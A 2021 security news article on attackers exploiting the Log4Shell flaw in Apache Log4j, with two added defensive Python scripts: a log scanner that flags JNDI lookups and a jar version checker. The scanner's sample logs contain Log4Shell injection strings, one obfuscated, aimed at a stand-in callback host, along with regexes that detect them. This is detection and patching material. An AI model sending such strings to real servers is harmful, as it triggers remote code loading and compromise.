13 December 2021

Hackers actively use the Log4Shell vulnerability to install malware

Cybercriminals are actively scanning the internet for the critical Log4Shell vulnerability (CVE-2021-44228) in the Java-based Apache Log4j logging library in order to install malware. The vulnerability allows attackers to execute code remotely on a vulnerable server.

When the vulnerability was first discovered, threat actors exploited it to run shell scripts that install cryptominers. The shell script removes competing malware from the compromised device and then downloads and installs the Kinsing miner.

According to Netlab 360 researchers, attackers also use Log4Shell to install the Mirai and Muhstik malware on vulnerable devices. These malware families deploy cryptominers and allow their operators to carry out large-scale DDoS attacks. The attacks observed by the researchers targeted devices running Linux.

The Microsoft Threat Intelligence Center reported that the Log4j vulnerability has also been used to install Cobalt Strike beacons.

Threat actors and security researchers use the exploit to scan the web for vulnerable servers and gather information about them. Affected servers can be forced to access URLs or perform DNS requests for callback domains. This lets the scanner determine whether a server is vulnerable and use that knowledge for future attacks, research, or bug bounty claims.
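The scanning described above leaves traces in the logs of the servers being probed, and that is where a defender can first see it. The following Python script is an added example, not code from the article or from any of the vendors it mentions: it runs over a few constructed web-server access log lines and flags requests carrying a Log4j lookup, after collapsing the nested `${lower:…}`, `${upper:…}` and `${::-…}` lookups that are commonly used to disguise the string. The log format, IP addresses and callback hostname are all constructed for the example.

```python
import re

# Constructed sample access-log lines (not from the article): two probes carrying a
# Log4j lookup in the User-Agent and in the request path, and one benign request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:12:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.test/a}"
203.0.113.8 - - [10/Dec/2021:12:01:05 +0000] "GET /${${lower:j}ndi:dns://callback.example.test/b} HTTP/1.1" 404 0 "-" "curl/7.79"
198.51.100.2 - - [10/Dec/2021:12:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Inner lookups that only rewrite characters: ${lower:x}, ${upper:x} and the
# default-value form ${::-x} all evaluate to x.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}|\$\{::-([^{}$]*)\}")
# What remains after normalisation is matched case-insensitively via lower().
_JNDI = re.compile(r"\$\{jndi:")


def normalize(s: str) -> str:
    """Collapse character-rewriting lookups from the inside out until none remain,
    then lowercase so that ${JNDI: and ${jndi: compare equal."""
    prev = None
    while prev != s:
        prev = s
        s = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s.lower()


def scan_log(text: str) -> list:
    """Return one record per log line that contains a Log4j JNDI lookup after
    normalisation: line number, source address (first field) and normalised text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append({"line": lineno, "src": line.split(" ", 1)[0], "normalized": norm})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['src']}: {hit['normalized']}")
```

A hit on a server that is still running an unpatched Log4j release is a reason to check that host for the callbacks the article describes (outbound LDAP, RMI or DNS to the hostname in the lookup), not just to count the probe. Only the headers and fields your server actually logs can be scanned this way, so the same normalisation should be applied to any other input that reaches Log4j.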

So far there have been no reported cases of the vulnerability being exploited by ransomware operators or APT groups; however, the deployment of Cobalt Strike beacons suggests that such campaigns are coming.

Users are strongly advised to update to the latest version of Log4j as soon as possible to fix the vulnerability.
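Updating is only possible once you know which jars on a host still carry an old Log4j. The script below is an added example, not code from the article or from Apache: it inspects a jar's `META-INF/MANIFEST.MF` for an `Implementation-Version` (the usual Maven convention for log4j-core builds, assumed here) and checks whether the `org/apache/logging/log4j/core/lookup/JndiLookup.class` entry is present, then reports whether the jar is below the fixed version. The article names 2.15.0 as the patched release; later Log4j advisories raised that threshold, so the example takes it as a parameter. The jars it inspects are constructed in memory for the example and contain only a manifest and an empty class entry.

```python
import io
import re
import zipfile

# Fixed version named in the article; pass a higher tuple to follow later advisories.
DEFAULT_FIXED = (2, 15, 0)

# Class that implements the JNDI lookup in Log4j 2; its absence means the lookup
# cannot run even in an old release.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); keeps leading digits of each part so '2.15.0-rc1' -> (2, 15, 0)."""
    parts = []
    for p in v.strip().split("."):
        m = re.match(r"\d+", p)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def inspect_jar(data: bytes, fixed=DEFAULT_FIXED) -> dict:
    """Report the manifest version, whether JndiLookup is bundled, and a verdict.
    A jar needs updating if it bundles JndiLookup and is either unversioned or older
    than `fixed`."""
    result = {"version": None, "has_jndi_lookup": False, "needs_update": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        result["has_jndi_lookup"] = JNDI_LOOKUP_ENTRY in names
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if m:
                result["version"] = m.group(1)
    if result["has_jndi_lookup"]:
        ver = result["version"]
        if ver is None or parse_version(ver) < fixed:
            result["needs_update"] = True
    return result


def make_jar(version: str, include_lookup: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar (example only): a manifest and,
    optionally, an empty JndiLookup.class entry. Enough for the checks above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP_ENTRY, b"")
    return buf.getvalue()


def inventory(jars: dict, fixed=DEFAULT_FIXED) -> dict:
    """Run inspect_jar over a {name: bytes} mapping, e.g. built from a directory walk."""
    return {name: inspect_jar(data, fixed) for name, data in jars.items()}


# Constructed sample inventory: one old jar, one at the fixed version, and one old
# jar from which JndiLookup.class has been removed.
SAMPLE_JARS = {
    "log4j-core-2.14.1.jar": make_jar("2.14.1", True),
    "log4j-core-2.15.0.jar": make_jar("2.15.0", True),
    "log4j-core-2.14.1-stripped.jar": make_jar("2.14.1", False),
}

if __name__ == "__main__":
    for name, r in inventory(SAMPLE_JARS).items():
        print(name, r)
```

On a real host the `SAMPLE_JARS` mapping would be replaced by reading every `*.jar` found under the application directories; nested jars inside war or ear files need the same treatment recursively. A jar without `JndiLookup.class` is reported as not needing the update because removing that class was Apache's own fallback for installations that could not upgrade at the time, but the cleaner fix remains the version update the article recommends.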

In addition, researchers from the cybersecurity firm Cybereason have developed a "vaccine" that can be used to remotely neutralize the critical Log4Shell vulnerability. Although Apache quickly released a patched version, Log4j 2.15.0, to address the vulnerability, the flaw remains very easy to exploit.

The "vaccine" disables settings in the remote vulnerable Log4j instance. Essentially, it removes the vulnerability by exploiting the vulnerable server itself. The project, called Logout4Shell, contains a Java payload that disables the "trustURLCodebase" setting on the remote Log4j server.

You can track the list of affected vendors and software via the following URL:
https://www.cybersecurity-help.cz/reports/ApacheLog4J.php
